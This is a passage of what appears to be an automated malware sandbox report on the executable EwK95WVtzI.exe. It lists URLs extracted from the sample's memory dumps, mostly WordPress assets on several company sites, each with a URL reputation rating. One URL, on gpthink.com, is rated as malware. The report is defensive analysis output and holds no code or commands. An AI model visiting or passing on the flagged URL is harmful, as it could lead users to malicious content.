                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornikEwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-2-1170x658.jpgEwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.62EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.0EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svgEwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://oss.maxcdn.com/respond/1.4.2/respond.min.jsEwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-150x150.jpgEwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wcEwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://pohlfood.com/#websiteEwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.pcgrate.com/#webpageEwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://inhouse.pohlfood.com/EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Prenosne-naprave.svgEwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=26c380492a5e27db8a412ecddEwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://www.pcgrate.com/wp-content/uploads/the7-css/post-type-dynamic.css?ver=c08792de11d2EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/prikazovalnik-toka-jola/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/meritevEwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.jsEwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://gpthink.com/product/204.htmlEwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          unknown
                                                                                                                                                          https://www.elpro.si/wp-content/uploads/2023/10/Kalibracija-in-kalibracijski-rok-1.pngEwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpfalse
